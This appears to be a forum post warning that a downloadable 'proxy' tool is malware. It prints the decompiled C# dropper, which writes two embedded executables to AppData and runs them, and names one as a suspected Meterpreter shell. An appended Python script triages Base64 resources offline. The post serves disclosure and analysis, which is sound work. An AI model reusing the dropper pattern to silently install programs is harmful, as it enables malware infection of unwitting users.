I have confirmation that this is a malicious file (I guess it is Metasploit, but it is too early to tell) inside of this "proxy", and it writes two files to %AppData%: "JKSYSpkQbg.exe" and "FPewwxQAhM.exe". I will keep you posted; this is a threat.
Here is the source code of the program:
Code:
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Resources;

namespace Bound
{
    internal static class Open
    {
        private static void Main()
        {
            try
            {
                // Loads the "files" resource set embedded in this assembly; the two
                // resource entries below hold the payload executables.
                ResourceManager resourceManager = new ResourceManager("files", Assembly.GetExecutingAssembly());

                // Note: GetFolderPath() returns the path without a trailing separator, so
                // "...\AppData\Local" + "JKSYSpkQbg.exe" lands in ...\AppData as
                // "LocalJKSYSpkQbg.exe" rather than inside the Local folder. Useful detail
                // when hunting for the dropped files.
                File.WriteAllBytes(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "JKSYSpkQbg.exe", (byte[]) resourceManager.GetObject("TGMdRmjNpf"));
                Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "JKSYSpkQbg.exe");

                // Second payload, written and started the same way.
                File.WriteAllBytes(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "FPewwxQAhM.exe", (byte[]) resourceManager.GetObject("KCTnsdBxFI"));
                Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "FPewwxQAhM.exe");
            }
            catch (Exception ex)
            {
                // On failure the error is shown and the console waits for a keypress.
                Console.WriteLine(ex.Message);
                Console.Read();
            }
        }
    }
}
The resources are basically Base64 strings of the programs; when you decrypt the Base64, you get the exe, and there are two that are viruses.
First file scan: AxZvCDtRsA.exe, which is the "proxy" but also contains malicious code:
Second file: FPewwxQAhM.exe, which seems to be a Meterpreter shell:
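For anyone triaging a sample like this, the following is an added example (not the poster's code, and not taken from the binder itself) of how to check an extracted Base64 resource offline before running anything: decode it, verify it actually carries a PE (MZ header plus a "PE\0\0" signature at e_lfanew), and hash it for lookup. The sample resource is constructed inline (a fake minimal PE header, not a real executable), and the function names are my own.

```python
import base64
import hashlib
import struct


def build_fake_pe() -> bytes:
    """Constructed test input: a DOS header whose e_lfanew (offset 0x3C)
    points at a 'PE\\0\\0' signature. Not a real executable."""
    dos = bytearray(b"MZ" + b"\x00" * 62)          # 64-byte DOS header
    struct.pack_into("<I", dos, 0x3C, 0x80)        # e_lfanew -> 0x80
    return bytes(dos).ljust(0x80, b"\x00") + b"PE\x00\x00" + b"\x00" * 20


# Constructed sample resource, Base64-encoded the way the binder stores its payloads.
SAMPLE_RESOURCE_B64 = base64.b64encode(build_fake_pe()).decode()

# Constructed non-PE resource, to show the negative case.
SAMPLE_TEXT_B64 = base64.b64encode(b"hello").decode()


def decode_resource(b64: str) -> bytes:
    """Strict Base64 decode; rejects junk instead of silently skipping it."""
    return base64.b64decode(b64, validate=True)


def looks_like_pe(blob: bytes) -> bool:
    """True if blob has an MZ header and a PE signature at e_lfanew."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if e_lfanew + 4 > len(blob):          # e_lfanew beyond the data: not a valid PE
        return False
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def triage(b64: str) -> dict:
    """Decode one resource and report size, PE-ness and SHA-256 without writing it to disk."""
    blob = decode_resource(b64)
    return {
        "size": len(blob),
        "is_pe": looks_like_pe(blob),
        "sha256": hashlib.sha256(blob).hexdigest(),
    }


if __name__ == "__main__":
    for name, res in (("payload", SAMPLE_RESOURCE_B64), ("text", SAMPLE_TEXT_B64)):
        print(name, triage(res))
```

The point of hashing the decoded bytes rather than the resource string is that the hash of the dropped file on disk is what scanners and sandbox reports key on; the Base64 wrapper changes the hash and defeats a lookup.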